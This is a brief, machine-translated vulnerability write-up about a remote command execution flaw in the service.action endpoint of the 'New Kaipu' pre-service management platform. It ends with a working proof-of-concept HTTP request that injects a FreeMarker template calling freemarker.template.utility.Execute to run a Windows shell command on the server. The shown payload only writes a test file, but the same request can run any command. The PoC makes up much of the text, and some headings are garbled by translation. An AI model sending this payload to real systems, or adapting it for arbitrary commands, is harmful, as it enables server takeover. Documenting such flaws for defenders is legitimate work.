New Kaipu Pre Service Management Platform Service Action Remote Command Execution Vulnerability
New Kaipu Pre Service Management Platform Service Action Remote Command Execution Vulnerability
Xinkaipu Pre-service management platform service.action remote command execution vulnerability
Vulnerability Description
The service.action interface of the new Kaipu pre-service management platform has a remote command execution vulnerability, and an attacker can obtain server permissions through the vulnerability.
Vulnerability Impact
New Proprietary Service Management Platform
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
2
3
4
5
6
POST /service_transport/service.action HTTP/1.1
Host:
Accept: */*
Content-Type: application/json
{"command":"GetFZinfo","UnitCode":"<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo Test > ./webapps/ROOT/Test.txt\")}"}
This post is licensed under CC BY 4.0 by the author.